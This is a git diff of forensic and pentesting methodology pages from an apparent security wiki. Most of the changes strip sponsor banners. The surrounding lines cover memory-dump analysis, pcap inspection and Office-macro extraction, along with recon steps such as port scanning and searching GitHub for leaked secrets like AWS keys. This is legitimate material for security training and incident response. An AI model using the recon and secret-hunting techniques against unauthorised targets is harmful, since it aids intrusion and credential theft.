- -\ -Use [**Trickest**](https://trickest.com/?utm_source=hacktricks&utm_medium=text&utm_campaign=ppc&utm_content=linux-forensics) to easily build and **automate workflows** powered by the world's **most advanced** community tools.\ -Get Access Today: - -{% embed url="https://trickest.com/?utm_source=hacktricks&utm_medium=banner&utm_campaign=ppc&utm_content=linux-forensics" %} - ## Review User Accounts and Logon Activities Examine the _**/etc/passwd**_, _**/etc/shadow**_ and **security logs** for unusual names or accounts created and or used in close proximity to known unauthorized events. Also, check possible sudo brute-force attacks.\ @@ -429,10 +397,5 @@ git diff --no-index --diff-filter=D path/to/old_version/ path/to/new_version/ {{#include ../../banners/hacktricks-training.md}} -
-\ -Use [**Trickest**](https://trickest.com/?utm_source=hacktricks&utm_medium=text&utm_campaign=ppc&utm_content=linux-forensics) to easily build and **automate workflows** powered by the world's **most advanced** community tools.\ -Get Access Today: -{% embed url="https://trickest.com/?utm_source=hacktricks&utm_medium=banner&utm_campaign=ppc&utm_content=linux-forensics" %} diff --git a/src/generic-methodologies-and-resources/basic-forensic-methodology/malware-analysis.md b/src/generic-methodologies-and-resources/basic-forensic-methodology/malware-analysis.md index c7edd6650..b3d7379c3 100644 --- a/src/generic-methodologies-and-resources/basic-forensic-methodology/malware-analysis.md +++ b/src/generic-methodologies-and-resources/basic-forensic-methodology/malware-analysis.md @@ -170,3 +170,5 @@ If the files of a folder **shouldn't have been modified**, you can calculate the When the information is saved in logs you can **check statistics like how many times each file of a web server was accessed as a web shell might be one of the most**. {{#include ../../banners/hacktricks-training.md}} + + diff --git a/src/generic-methodologies-and-resources/basic-forensic-methodology/memory-dump-analysis/README.md b/src/generic-methodologies-and-resources/basic-forensic-methodology/memory-dump-analysis/README.md index 1c8be749a..f293ef856 100644 --- a/src/generic-methodologies-and-resources/basic-forensic-methodology/memory-dump-analysis/README.md +++ b/src/generic-methodologies-and-resources/basic-forensic-methodology/memory-dump-analysis/README.md @@ -2,12 +2,6 @@ {{#include ../../../banners/hacktricks-training.md}} -
- -[**RootedCON**](https://www.rootedcon.com/) is the most relevant cybersecurity event in **Spain** and one of the most important in **Europe**. With **the mission of promoting technical knowledge**, this congress is a boiling meeting point for technology and cybersecurity professionals in every discipline. - -{% embed url="https://www.rootedcon.com/" %} - ## Start Start **searching** for **malware** inside the pcap. Use the **tools** mentioned in [**Malware Analysis**](../malware-analysis.md). @@ -40,10 +34,6 @@ You should **open** it using **IDA** or **Radare** to inspection it in **depth** ​ -
- -[**RootedCON**](https://www.rootedcon.com/) is the most relevant cybersecurity event in **Spain** and one of the most important in **Europe**. With **the mission of promoting technical knowledge**, this congress is a boiling meeting point for technology and cybersecurity professionals in every discipline. - -{% embed url="https://www.rootedcon.com/" %} - {{#include ../../../banners/hacktricks-training.md}} + + diff --git a/src/generic-methodologies-and-resources/basic-forensic-methodology/memory-dump-analysis/volatility-cheatsheet.md b/src/generic-methodologies-and-resources/basic-forensic-methodology/memory-dump-analysis/volatility-cheatsheet.md index f6a63c08f..9b84eae0a 100644 --- a/src/generic-methodologies-and-resources/basic-forensic-methodology/memory-dump-analysis/volatility-cheatsheet.md +++ b/src/generic-methodologies-and-resources/basic-forensic-methodology/memory-dump-analysis/volatility-cheatsheet.md @@ -4,11 +4,7 @@ ​ -
-​​[**RootedCON**](https://www.rootedcon.com/) is the most relevant cybersecurity event in **Spain** and one of the most important in **Europe**. With **the mission of promoting technical knowledge**, this congress is a boiling meeting point for technology and cybersecurity professionals in every discipline. - -{% embed url="https://www.rootedcon.com/" %} If you need a tool that automates memory analysis with different scan levels and runs multiple Volatility3 plugins in parallel, you can use autoVolatility3:: [https://github.com/H3xKatana/autoVolatility3/](https://github.com/H3xKatana/autoVolatility3/) ```bash @@ -191,14 +187,6 @@ The memory dump of a process will **extract everything** of the current status o volatility -f file.dmp --profile=Win7SP1x86 memdump -p 2168 -D conhost/ ``` -​ - -
- -​​​[**RootedCON**](https://www.rootedcon.com/) is the most relevant cybersecurity event in **Spain** and one of the most important in **Europe**. With **the mission of promoting technical knowledge**, this congress is a boiling meeting point for technology and cybersecurity professionals in every discipline. - -{% embed url="https://www.rootedcon.com/" %} - ## Processes ### List processes @@ -468,11 +456,6 @@ volatility --profile=Win7SP1x86_23418 -f file.dmp userassist ​ -
- -​​​​[**RootedCON**](https://www.rootedcon.com/) is the most relevant cybersecurity event in **Spain** and one of the most important in **Europe**. With **the mission of promoting technical knowledge**, this congress is a boiling meeting point for technology and cybersecurity professionals in every discipline. - -{% embed url="https://www.rootedcon.com/" %} ## Services @@ -933,10 +916,6 @@ The **Master Boot Record (MBR)** plays a crucial role in managing the logical pa - [https://www.aldeid.com/wiki/Windows-userassist-keys](https://www.aldeid.com/wiki/Windows-userassist-keys) ​\* [https://learn.microsoft.com/en-us/windows/win32/fileio/master-file-table](https://learn.microsoft.com/en-us/windows/win32/fileio/master-file-table) - [https://answers.microsoft.com/en-us/windows/forum/all/uefi-based-pc-protective-mbr-what-is-it/0fc7b558-d8d4-4a7d-bae2-395455bb19aa](https://answers.microsoft.com/en-us/windows/forum/all/uefi-based-pc-protective-mbr-what-is-it/0fc7b558-d8d4-4a7d-bae2-395455bb19aa) -
- -[**RootedCON**](https://www.rootedcon.com/) is the most relevant cybersecurity event in **Spain** and one of the most important in **Europe**. With **the mission of promoting technical knowledge**, this congress is a boiling meeting point for technology and cybersecurity professionals in every discipline. - -{% embed url="https://www.rootedcon.com/" %} - {{#include ../../../banners/hacktricks-training.md}} + + diff --git a/src/generic-methodologies-and-resources/basic-forensic-methodology/partitions-file-systems-carving/README.md b/src/generic-methodologies-and-resources/basic-forensic-methodology/partitions-file-systems-carving/README.md index 9ac27c92e..34968e985 100644 --- a/src/generic-methodologies-and-resources/basic-forensic-methodology/partitions-file-systems-carving/README.md +++ b/src/generic-methodologies-and-resources/basic-forensic-methodology/partitions-file-systems-carving/README.md @@ -234,3 +234,5 @@ You may notice that even performing that action there might be **other parts whe - **iHackLabs Certified Digital Forensics Windows** {{#include ../../../banners/hacktricks-training.md}} + + diff --git a/src/generic-methodologies-and-resources/basic-forensic-methodology/partitions-file-systems-carving/file-data-carving-recovery-tools.md b/src/generic-methodologies-and-resources/basic-forensic-methodology/partitions-file-systems-carving/file-data-carving-recovery-tools.md index 1920c497a..610d78b88 100644 --- a/src/generic-methodologies-and-resources/basic-forensic-methodology/partitions-file-systems-carving/file-data-carving-recovery-tools.md +++ b/src/generic-methodologies-and-resources/basic-forensic-methodology/partitions-file-systems-carving/file-data-carving-recovery-tools.md @@ -93,3 +93,5 @@ You can use [**viu** ](https://github.com/atanunq/viu)to see images from the ter You can use the linux command line tool **pdftotext** to transform a pdf into text and read it. {{#include ../../../banners/hacktricks-training.md}} + + 
diff --git a/src/generic-methodologies-and-resources/basic-forensic-methodology/pcap-inspection/README.md b/src/generic-methodologies-and-resources/basic-forensic-methodology/pcap-inspection/README.md index c16bee711..62bae2154 100644 --- a/src/generic-methodologies-and-resources/basic-forensic-methodology/pcap-inspection/README.md +++ b/src/generic-methodologies-and-resources/basic-forensic-methodology/pcap-inspection/README.md @@ -2,12 +2,6 @@ {{#include ../../../banners/hacktricks-training.md}} -
- -[**RootedCON**](https://www.rootedcon.com/) is the most relevant cybersecurity event in **Spain** and one of the most important in **Europe**. With **the mission of promoting technical knowledge**, this congress is a boiling meeting point for technology and cybersecurity professionals in every discipline. - -{% embed url="https://www.rootedcon.com/" %} - > [!NOTE] > A note about **PCAP** vs **PCAPNG**: there are two versions of the PCAP file format; **PCAPNG is newer and not supported by all tools**. You may need to convert a file from PCAPNG to PCAP using Wireshark or another compatible tool, in order to work with it in some other tools. @@ -106,12 +100,6 @@ Using common carving techniques can be useful to extract files and information f You can use tools like [https://github.com/lgandx/PCredz](https://github.com/lgandx/PCredz) to parse credentials from a pcap or a live interface. -
- -[**RootedCON**](https://www.rootedcon.com/) is the most relevant cybersecurity event in **Spain** and one of the most important in **Europe**. With **the mission of promoting technical knowledge**, this congress is a boiling meeting point for technology and cybersecurity professionals in every discipline. - -{% embed url="https://www.rootedcon.com/" %} - ## Check Exploits/Malware ### Suricata @@ -242,10 +230,6 @@ usb-keystrokes.md ​ -
- -[**RootedCON**](https://www.rootedcon.com/) is the most relevant cybersecurity event in **Spain** and one of the most important in **Europe**. With **the mission of promoting technical knowledge**, this congress is a boiling meeting point for technology and cybersecurity professionals in every discipline. - -{% embed url="https://www.rootedcon.com/" %} - {{#include ../../../banners/hacktricks-training.md}} + + diff --git a/src/generic-methodologies-and-resources/basic-forensic-methodology/pcap-inspection/dnscat-exfiltration.md b/src/generic-methodologies-and-resources/basic-forensic-methodology/pcap-inspection/dnscat-exfiltration.md index aba634f34..9e07b899a 100644 --- a/src/generic-methodologies-and-resources/basic-forensic-methodology/pcap-inspection/dnscat-exfiltration.md +++ b/src/generic-methodologies-and-resources/basic-forensic-methodology/pcap-inspection/dnscat-exfiltration.md @@ -35,3 +35,5 @@ python3 dnscat_decoder.py sample.pcap bad_domain ``` {{#include ../../../banners/hacktricks-training.md}} + + diff --git a/src/generic-methodologies-and-resources/basic-forensic-methodology/pcap-inspection/suricata-and-iptables-cheatsheet.md b/src/generic-methodologies-and-resources/basic-forensic-methodology/pcap-inspection/suricata-and-iptables-cheatsheet.md index 4be42c696..eca3cbd80 100644 --- a/src/generic-methodologies-and-resources/basic-forensic-methodology/pcap-inspection/suricata-and-iptables-cheatsheet.md +++ b/src/generic-methodologies-and-resources/basic-forensic-methodology/pcap-inspection/suricata-and-iptables-cheatsheet.md @@ -232,3 +232,5 @@ drop tcp any any -> any 8000 (msg:"8000 port"; sid:1000;) ``` {{#include ../../../banners/hacktricks-training.md}} + + diff --git a/src/generic-methodologies-and-resources/basic-forensic-methodology/pcap-inspection/usb-keystrokes.md b/src/generic-methodologies-and-resources/basic-forensic-methodology/pcap-inspection/usb-keystrokes.md index 782e405aa..aa04adeb4 100644 
--- a/src/generic-methodologies-and-resources/basic-forensic-methodology/pcap-inspection/usb-keystrokes.md +++ b/src/generic-methodologies-and-resources/basic-forensic-methodology/pcap-inspection/usb-keystrokes.md @@ -19,3 +19,5 @@ You can read more information and find some scripts about how to analyse this in - [https://github.com/tanc7/HacktheBox_Deadly_Arthropod_Writeup](https://github.com/tanc7/HacktheBox_Deadly_Arthropod_Writeup) {{#include ../../../banners/hacktricks-training.md}} + + diff --git a/src/generic-methodologies-and-resources/basic-forensic-methodology/pcap-inspection/wifi-pcap-analysis.md b/src/generic-methodologies-and-resources/basic-forensic-methodology/pcap-inspection/wifi-pcap-analysis.md index f1371d5fa..00d0b9d65 100644 --- a/src/generic-methodologies-and-resources/basic-forensic-methodology/pcap-inspection/wifi-pcap-analysis.md +++ b/src/generic-methodologies-and-resources/basic-forensic-methodology/pcap-inspection/wifi-pcap-analysis.md @@ -41,3 +41,5 @@ Edit --> Preferences --> Protocols --> IEEE 802.11--> Edit ![](<../../../images/image (499).png>) {{#include ../../../banners/hacktricks-training.md}} + + diff --git a/src/generic-methodologies-and-resources/basic-forensic-methodology/pcap-inspection/wireshark-tricks.md b/src/generic-methodologies-and-resources/basic-forensic-methodology/pcap-inspection/wireshark-tricks.md index 6565bd680..58d29a3e7 100644 --- a/src/generic-methodologies-and-resources/basic-forensic-methodology/pcap-inspection/wireshark-tricks.md +++ b/src/generic-methodologies-and-resources/basic-forensic-methodology/pcap-inspection/wireshark-tricks.md @@ -155,3 +155,5 @@ f.close() ``` {{#include ../../../banners/hacktricks-training.md}} + + diff --git a/src/generic-methodologies-and-resources/basic-forensic-methodology/specific-software-file-type-tricks/.pyc.md b/src/generic-methodologies-and-resources/basic-forensic-methodology/specific-software-file-type-tricks/.pyc.md index ec397e99a..be52ee567 100644 
--- a/src/generic-methodologies-and-resources/basic-forensic-methodology/specific-software-file-type-tricks/.pyc.md +++ b/src/generic-methodologies-and-resources/basic-forensic-methodology/specific-software-file-type-tricks/.pyc.md @@ -2,11 +2,6 @@ {{#include ../../../banners/hacktricks-training.md}} -
- -**Bug bounty tip**: **sign up** for **Intigriti**, a premium **bug bounty platform created by hackers, for hackers**! Join us at [**https://go.intigriti.com/hacktricks**](https://go.intigriti.com/hacktricks) today, and start earning bounties up to **$100,000**! - -{% embed url="https://go.intigriti.com/hacktricks" %} ## From Compiled Binary to .pyc @@ -223,10 +218,7 @@ C:\Users\test\Desktop\test>pyinstaller --onefile hello.py - [https://blog.f-secure.com/how-to-decompile-any-python-binary/](https://blog.f-secure.com/how-to-decompile-any-python-binary/) -
- -**Bug bounty tip**: **sign up** for **Intigriti**, a premium **bug bounty platform created by hackers, for hackers**! Join us at [**https://go.intigriti.com/hacktricks**](https://go.intigriti.com/hacktricks) today, and start earning bounties up to **$100,000**! - -{% embed url="https://go.intigriti.com/hacktricks" %} {{#include ../../../banners/hacktricks-training.md}} + + diff --git a/src/generic-methodologies-and-resources/basic-forensic-methodology/specific-software-file-type-tricks/README.md b/src/generic-methodologies-and-resources/basic-forensic-methodology/specific-software-file-type-tricks/README.md index 76fa3ef23..b3cf47a1b 100644 --- a/src/generic-methodologies-and-resources/basic-forensic-methodology/specific-software-file-type-tricks/README.md +++ b/src/generic-methodologies-and-resources/basic-forensic-methodology/specific-software-file-type-tricks/README.md @@ -39,3 +39,5 @@ zips-tricks.md {{#endref}} {{#include ../../../banners/hacktricks-training.md}} + + diff --git a/src/generic-methodologies-and-resources/basic-forensic-methodology/specific-software-file-type-tricks/browser-artifacts.md b/src/generic-methodologies-and-resources/basic-forensic-methodology/specific-software-file-type-tricks/browser-artifacts.md index 104a7530f..9eb0afb2e 100644 --- a/src/generic-methodologies-and-resources/basic-forensic-methodology/specific-software-file-type-tricks/browser-artifacts.md +++ b/src/generic-methodologies-and-resources/basic-forensic-methodology/specific-software-file-type-tricks/browser-artifacts.md @@ -2,14 +2,6 @@ {{#include ../../../banners/hacktricks-training.md}} -
- -\ -Use [**Trickest**](https://trickest.com/?utm_source=hacktricks&utm_medium=text&utm_campaign=ppc&utm_content=browser-artifacts) to easily build and **automate workflows** powered by the world's **most advanced** community tools.\ -Get Access Today: - -{% embed url="https://trickest.com/?utm_source=hacktricks&utm_medium=banner&utm_campaign=ppc&utm_content=browser-artifacts" %} - ## Browsers Artifacts Browser artifacts include various types of data stored by web browsers, such as navigation history, bookmarks, and cache data. These artifacts are kept in specific folders within the operating system, differing in location and name across browsers, yet generally storing similar data types. @@ -169,12 +161,7 @@ These paths and commands are crucial for accessing and understanding the browsin - [https://books.google.com/books?id=jfMqCgAAQBAJ\&pg=PA128\&lpg=PA128\&dq=%22This+file](https://books.google.com/books?id=jfMqCgAAQBAJ&pg=PA128&lpg=PA128&dq=%22This+file) - **Book: OS X Incident Response: Scripting and Analysis By Jaron Bradley pag 123** -
- -\ -Use [**Trickest**](https://trickest.com/?utm_source=hacktricks&utm_medium=text&utm_campaign=ppc&utm_content=browser-artifacts) to easily build and **automate workflows** powered by the world's **most advanced** community tools.\ -Get Access Today: - -{% embed url="https://trickest.com/?utm_source=hacktricks&utm_medium=banner&utm_campaign=ppc&utm_content=browser-artifacts" %} {{#include ../../../banners/hacktricks-training.md}} + + diff --git a/src/generic-methodologies-and-resources/basic-forensic-methodology/specific-software-file-type-tricks/desofuscation-vbs-cscript.exe.md b/src/generic-methodologies-and-resources/basic-forensic-methodology/specific-software-file-type-tricks/desofuscation-vbs-cscript.exe.md index c22a6f566..4a514defb 100644 --- a/src/generic-methodologies-and-resources/basic-forensic-methodology/specific-software-file-type-tricks/desofuscation-vbs-cscript.exe.md +++ b/src/generic-methodologies-and-resources/basic-forensic-methodology/specific-software-file-type-tricks/desofuscation-vbs-cscript.exe.md @@ -48,3 +48,5 @@ End Function ``` {{#include ../../../banners/hacktricks-training.md}} + + diff --git a/src/generic-methodologies-and-resources/basic-forensic-methodology/specific-software-file-type-tricks/local-cloud-storage.md b/src/generic-methodologies-and-resources/basic-forensic-methodology/specific-software-file-type-tricks/local-cloud-storage.md index f64869c3c..492d9c0c0 100644 --- a/src/generic-methodologies-and-resources/basic-forensic-methodology/specific-software-file-type-tricks/local-cloud-storage.md +++ b/src/generic-methodologies-and-resources/basic-forensic-methodology/specific-software-file-type-tricks/local-cloud-storage.md @@ -2,13 +2,6 @@ {{#include ../../../banners/hacktricks-training.md}} -
- -\ -Use [**Trickest**](https://trickest.com/?utm_source=hacktricks&utm_medium=text&utm_campaign=ppc&utm_content=local-cloud-storage) to easily build and **automate workflows** powered by the world's **most advanced** community tools.\ -Get Access Today: - -{% embed url="https://trickest.com/?utm_source=hacktricks&utm_medium=banner&utm_campaign=ppc&utm_content=local-cloud-storage" %} ## OneDrive @@ -103,12 +96,6 @@ Other tables inside this database contain more interesting information: - **deleted_fields**: Dropbox deleted files - **date_added** -
- -\ -Use [**Trickest**](https://trickest.com/?utm_source=hacktricks&utm_medium=text&utm_campaign=ppc&utm_content=local-cloud-storage) to easily build and **automate workflows** powered by the world's **most advanced** community tools.\ -Get Access Today: - -{% embed url="https://trickest.com/?utm_source=hacktricks&utm_medium=banner&utm_campaign=ppc&utm_content=local-cloud-storage" %} - {{#include ../../../banners/hacktricks-training.md}} + + diff --git a/src/generic-methodologies-and-resources/basic-forensic-methodology/specific-software-file-type-tricks/office-file-analysis.md b/src/generic-methodologies-and-resources/basic-forensic-methodology/specific-software-file-type-tricks/office-file-analysis.md index 2e07c739d..0304cb9c0 100644 --- a/src/generic-methodologies-and-resources/basic-forensic-methodology/specific-software-file-type-tricks/office-file-analysis.md +++ b/src/generic-methodologies-and-resources/basic-forensic-methodology/specific-software-file-type-tricks/office-file-analysis.md @@ -2,13 +2,6 @@ {{#include ../../../banners/hacktricks-training.md}} -
- -\ -Use [**Trickest**](https://trickest.com/?utm_source=hacktricks&utm_medium=text&utm_campaign=ppc&utm_content=office-file-analysis) to easily build and **automate workflows** powered by the world's **most advanced** community tools.\ -Get Access Today: - -{% embed url="https://trickest.com/?utm_source=hacktricks&utm_medium=banner&utm_campaign=ppc&utm_content=office-file-analysis" %} For further information check [https://trailofbits.github.io/ctf/forensics/](https://trailofbits.github.io/ctf/forensics/). This is just a sumary: @@ -25,12 +18,6 @@ sudo pip3 install -U oletools olevba -c /path/to/document #Extract macros ``` -
- -\ -Use [**Trickest**](https://trickest.com/?utm_source=hacktricks&utm_medium=text&utm_campaign=ppc&utm_content=office-file-analysis) to easily build and **automate workflows** powered by the world's **most advanced** community tools.\ -Get Access Today: - -{% embed url="https://trickest.com/?utm_source=hacktricks&utm_medium=banner&utm_campaign=ppc&utm_content=office-file-analysis" %} - {{#include ../../../banners/hacktricks-training.md}} + + diff --git a/src/generic-methodologies-and-resources/basic-forensic-methodology/specific-software-file-type-tricks/pdf-file-analysis.md b/src/generic-methodologies-and-resources/basic-forensic-methodology/specific-software-file-type-tricks/pdf-file-analysis.md index 769407b3a..b32d72ddf 100644 --- a/src/generic-methodologies-and-resources/basic-forensic-methodology/specific-software-file-type-tricks/pdf-file-analysis.md +++ b/src/generic-methodologies-and-resources/basic-forensic-methodology/specific-software-file-type-tricks/pdf-file-analysis.md @@ -2,14 +2,6 @@ {{#include ../../../banners/hacktricks-training.md}} -
- -\ -Use [**Trickest**](https://trickest.com/?utm_source=hacktricks&utm_medium=text&utm_campaign=ppc&utm_term=trickest&utm_content=pdf-file-analysis) to easily build and **automate workflows** powered by the world's **most advanced** community tools.\ -Get Access Today: - -{% embed url="https://trickest.com/?utm_source=hacktricks&utm_medium=banner&utm_campaign=ppc&utm_content=pdf-file-analysis" %} - **For further details check:** [**https://trailofbits.github.io/ctf/forensics/**](https://trailofbits.github.io/ctf/forensics/) The PDF format is known for its complexity and potential for concealing data, making it a focal point for CTF forensics challenges. It combines plain-text elements with binary objects, which might be compressed or encrypted, and can include scripts in languages like JavaScript or Flash. To understand PDF structure, one can refer to Didier Stevens's [introductory material](https://blog.didierstevens.com/2008/04/09/quickpost-about-the-physical-and-logical-structure-of-pdf-files/), or use tools like a text editor or a PDF-specific editor such as Origami. @@ -26,3 +18,5 @@ For in-depth exploration or manipulation of PDFs, tools like [qpdf](https://gith For custom PDF analysis, Python libraries like [PeepDF](https://github.com/jesparza/peepdf) can be used to craft bespoke parsing scripts. Further, the PDF's potential for hidden data storage is so vast that resources like the NSA guide on PDF risks and countermeasures, though no longer hosted at its original location, still offer valuable insights. A [copy of the guide](http://www.itsecure.hu/library/file/Biztons%C3%A1gi%20%C3%BAtmutat%C3%B3k/Alkalmaz%C3%A1sok/Hidden%20Data%20and%20Metadata%20in%20Adobe%20PDF%20Files.pdf) and a collection of [PDF format tricks](https://github.com/corkami/docs/blob/master/PDF/PDF.md) by Ange Albertini can provide further reading on the subject. {{#include ../../../banners/hacktricks-training.md}} + + 
diff --git a/src/generic-methodologies-and-resources/basic-forensic-methodology/specific-software-file-type-tricks/png-tricks.md b/src/generic-methodologies-and-resources/basic-forensic-methodology/specific-software-file-type-tricks/png-tricks.md index 6108df028..d577ba693 100644 --- a/src/generic-methodologies-and-resources/basic-forensic-methodology/specific-software-file-type-tricks/png-tricks.md +++ b/src/generic-methodologies-and-resources/basic-forensic-methodology/specific-software-file-type-tricks/png-tricks.md @@ -7,3 +7,5 @@ For checking PNG file integrity and repairing corruption, **pngcheck** is a cruc These strategies underscore the importance of a comprehensive approach in CTFs, utilizing a blend of analytical tools and repair techniques to uncover and recover hidden or lost data. {{#include ../../../banners/hacktricks-training.md}} + + diff --git a/src/generic-methodologies-and-resources/basic-forensic-methodology/specific-software-file-type-tricks/video-and-audio-file-analysis.md b/src/generic-methodologies-and-resources/basic-forensic-methodology/specific-software-file-type-tricks/video-and-audio-file-analysis.md index 3d2103987..67acc6386 100644 --- a/src/generic-methodologies-and-resources/basic-forensic-methodology/specific-software-file-type-tricks/video-and-audio-file-analysis.md +++ b/src/generic-methodologies-and-resources/basic-forensic-methodology/specific-software-file-type-tricks/video-and-audio-file-analysis.md @@ -15,3 +15,5 @@ This array of tools underscores the versatility required in CTF challenges, wher - [https://trailofbits.github.io/ctf/forensics/](https://trailofbits.github.io/ctf/forensics/) {{#include ../../../banners/hacktricks-training.md}} + + diff --git a/src/generic-methodologies-and-resources/basic-forensic-methodology/specific-software-file-type-tricks/zips-tricks.md b/src/generic-methodologies-and-resources/basic-forensic-methodology/specific-software-file-type-tricks/zips-tricks.md index d4e17eb0d..cf87f9a6c 100644 
--- a/src/generic-methodologies-and-resources/basic-forensic-methodology/specific-software-file-type-tricks/zips-tricks.md +++ b/src/generic-methodologies-and-resources/basic-forensic-methodology/specific-software-file-type-tricks/zips-tricks.md @@ -19,3 +19,5 @@ It's crucial to note that password-protected zip files **do not encrypt filename - [https://michael-myers.github.io/blog/categories/ctf/](https://michael-myers.github.io/blog/categories/ctf/) {{#include ../../../banners/hacktricks-training.md}} + + diff --git a/src/generic-methodologies-and-resources/basic-forensic-methodology/windows-forensics/README.md b/src/generic-methodologies-and-resources/basic-forensic-methodology/windows-forensics/README.md index bf7543e9b..dd8a4bd31 100644 --- a/src/generic-methodologies-and-resources/basic-forensic-methodology/windows-forensics/README.md +++ b/src/generic-methodologies-and-resources/basic-forensic-methodology/windows-forensics/README.md @@ -502,3 +502,5 @@ EventID 6005 indicates system startup, while EventID 6006 marks shutdown. Security EventID 1102 signals the deletion of logs, a critical event for forensic analysis. {{#include ../../../banners/hacktricks-training.md}} + + diff --git a/src/generic-methodologies-and-resources/basic-forensic-methodology/windows-forensics/interesting-windows-registry-keys.md b/src/generic-methodologies-and-resources/basic-forensic-methodology/windows-forensics/interesting-windows-registry-keys.md index 840b910bc..c508fab70 100644 --- a/src/generic-methodologies-and-resources/basic-forensic-methodology/windows-forensics/interesting-windows-registry-keys.md +++ b/src/generic-methodologies-and-resources/basic-forensic-methodology/windows-forensics/interesting-windows-registry-keys.md @@ -99,3 +99,5 @@ This guide condenses the crucial paths and methods for accessing detailed system, network, and user activity information on Windows systems, aiming for clarity and usability. {{#include ../../../banners/hacktricks-training.md}} + + 
diff --git a/src/generic-methodologies-and-resources/external-recon-methodology/README.md b/src/generic-methodologies-and-resources/external-recon-methodology/README.md index ef4a9559e..21179e3d8 100644 --- a/src/generic-methodologies-and-resources/external-recon-methodology/README.md +++ b/src/generic-methodologies-and-resources/external-recon-methodology/README.md @@ -2,11 +2,6 @@ {{#include ../../banners/hacktricks-training.md}} -
- -If you are interested in **hacking career** and hack the unhackable - **we are hiring!** (_fluent polish written and spoken required_). - -{% embed url="https://www.stmcyber.com/careers" %} ## Assets discoveries @@ -204,10 +199,7 @@ Check for some [domain takeover](../../pentesting-web/domain-subdomain-takeover. If you find any **domain with an IP different** from the ones you already found in the assets discovery, you should perform a **basic vulnerability scan** (using Nessus or OpenVAS) and some [**port scan**](../pentesting-network/#discovering-hosts-from-the-outside) with **nmap/masscan/shodan**. Depending on which services are running you can find in **this book some tricks to "attack" them**.\ &#xNAN;_Note that sometimes the domain is hosted inside an IP that is not controlled by the client, so it's not in the scope, be careful._ -\ -**Bug bounty tip**: **sign up** for **Intigriti**, a premium **bug bounty platform created by hackers, for hackers**! Join us at [**https://go.intigriti.com/hacktricks**](https://go.intigriti.com/hacktricks) today, and start earning bounties up to **$100,000**! -{% embed url="https://go.intigriti.com/hacktricks" %} ## Subdomains @@ -716,10 +708,7 @@ There are several tools out there that will perform part of the proposed actions - All free courses of [**@Jhaddix**](https://twitter.com/Jhaddix) like [**The Bug Hunter's Methodology v4.0 - Recon Edition**](https://www.youtube.com/watch?v=p4JgIu1mceI) -
- -If you are interested in **hacking career** and hack the unhackable - **we are hiring!** (_fluent polish written and spoken required_). - -{% embed url="https://www.stmcyber.com/careers" %} {{#include ../../banners/hacktricks-training.md}} + + diff --git a/src/generic-methodologies-and-resources/external-recon-methodology/github-leaked-secrets.md b/src/generic-methodologies-and-resources/external-recon-methodology/github-leaked-secrets.md index 53e1f35e6..3aeaccac3 100644 --- a/src/generic-methodologies-and-resources/external-recon-methodology/github-leaked-secrets.md +++ b/src/generic-methodologies-and-resources/external-recon-methodology/github-leaked-secrets.md @@ -2,10 +2,7 @@ {{#include ../../banners/hacktricks-training.md}} -\ -**Bug bounty tip**: **sign up** for **Intigriti**, a premium **bug bounty platform created by hackers, for hackers**! Join us at [**https://go.intigriti.com/hacktricks**](https://go.intigriti.com/hacktricks) today, and start earning bounties up to **$100,000**! -{% embed url="https://go.intigriti.com/hacktricks" %} Now that we have built the list of assets of our scope it's time to search for some OSINT low-hanging fruits. @@ -312,3 +309,5 @@ AWS SECRET ``` {{#include ../../banners/hacktricks-training.md}} + + diff --git a/src/generic-methodologies-and-resources/external-recon-methodology/wide-source-code-search.md b/src/generic-methodologies-and-resources/external-recon-methodology/wide-source-code-search.md index 55186e1f3..c3b284015 100644 --- a/src/generic-methodologies-and-resources/external-recon-methodology/wide-source-code-search.md +++ b/src/generic-methodologies-and-resources/external-recon-methodology/wide-source-code-search.md 
@@ -16,3 +16,5 @@ This helps in several occasions to **search for leaked information** or for **vu > When you look for leaks in a repo and run something like `git log -p` don't forget there might be **other branches with other commits** containing secrets! {{#include ../../banners/hacktricks-training.md}} + + diff --git a/src/generic-methodologies-and-resources/pentesting-methodology.md b/src/generic-methodologies-and-resources/pentesting-methodology.md index ea6b7f6a7..77009d7b7 100644 --- a/src/generic-methodologies-and-resources/pentesting-methodology.md +++ b/src/generic-methodologies-and-resources/pentesting-methodology.md @@ -2,11 +2,6 @@ {{#include ../banners/hacktricks-training.md}} -
- -If you are interested in **hacking career** and hack the unhackable - **we are hiring!** (_fluent polish written and spoken required_). - -{% embed url="https://www.stmcyber.com/careers" %} ## Pentesting Methodology @@ -137,10 +132,7 @@ Check also the page about [**NTLM**](../windows-hardening/ntlm/), it could be ve - [**CBC-MAC**](../crypto-and-stego/cipher-block-chaining-cbc-mac-priv.md) - [**Padding Oracle**](../crypto-and-stego/padding-oracle-priv.md) -
- -If you are interested in **hacking career** and hack the unhackable - **we are hiring!** (_fluent polish written and spoken required_). - -{% embed url="https://www.stmcyber.com/careers" %} {{#include ../banners/hacktricks-training.md}} + + diff --git a/src/generic-methodologies-and-resources/pentesting-network/README.md b/src/generic-methodologies-and-resources/pentesting-network/README.md index 1f4bb741f..060eca9a0 100644 --- a/src/generic-methodologies-and-resources/pentesting-network/README.md +++ b/src/generic-methodologies-and-resources/pentesting-network/README.md @@ -2,10 +2,7 @@ {{#include ../../banners/hacktricks-training.md}} -\ -**Bug bounty tip**: **sign up** for **Intigriti**, a premium **bug bounty platform created by hackers, for hackers**! Join us at [**https://go.intigriti.com/hacktricks**](https://go.intigriti.com/hacktricks) today, and start earning bounties up to **$100,000**! -{% embed url="https://go.intigriti.com/hacktricks" %} ## Discovering hosts from the outside @@ -900,9 +897,8 @@ Bettercap broadcast WSD packets searching for services (UDP Port 3702). - **Practical IoT Hacking: The Definitive Guide to Attacking the Internet of Things. By Fotios Chantzis, Ioannis Stais, Paulino Calderon, Evangelos Deirmentzoglou, Beau Wood** - [https://medium.com/@cursedpkt/cisco-nightmare-pentesting-cisco-networks-like-a-devil-f4032eb437b9](https://medium.com/@cursedpkt/cisco-nightmare-pentesting-cisco-networks-like-a-devil-f4032eb437b9) -\ -**Bug bounty tip**: **sign up** for **Intigriti**, a premium **bug bounty platform created by hackers, for hackers**! Join us at [**https://go.intigriti.com/hacktricks**](https://go.intigriti.com/hacktricks) today, and start earning bounties up to **$100,000**! -{% embed url="https://go.intigriti.com/hacktricks" %} {{#include ../../banners/hacktricks-training.md}} + + 
